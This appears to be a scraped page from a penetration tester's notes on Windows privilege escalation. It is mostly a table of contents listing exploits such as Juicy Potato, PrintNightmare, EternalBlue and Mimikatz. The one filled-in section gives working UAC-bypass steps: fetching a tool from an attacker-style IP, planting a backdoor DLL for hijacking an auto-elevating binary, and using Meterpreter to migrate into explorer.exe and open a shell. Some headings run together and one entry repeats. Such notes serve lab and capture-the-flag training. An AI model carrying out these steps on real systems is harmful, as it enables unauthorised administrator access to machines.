PrivilageEsc Windows π
01. Common Tricks
01.1 UAC Bypass
## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If is true; we are good to go!!
## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack
## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
### If you get any error saying "This operation requires an interactive window".
### You should use any kind of C2 (Use GreatSCT/MSBuild to launch Meterpreter)
## ------------------| Use with interactive shell
### Create payload and gain shell using following methord
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate the process to explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe01.2 If you have, in or can?
01.3 Service / Registry Exploits
02. Tools
02.1 PowerUp
02.3 Seatbelt
02.4 SecretsDump
03. Common Exploits
03.0 JuicyPotatoNG (New)
03.1 Juicy Potato (Abusing the golden privileges)
03.3 MultiPotato
03.4 PrintSpoofer
03.7 Serviio Insecure File Permissions
03.8 PrintNightmare
03.9 EternalBlue (MS17-010)
03.11 Windows Kernel Exploits
Microsoft Windows - Local Privilege Escalation (MS15-051)
USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)
USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)04. Mimikatz
Last updated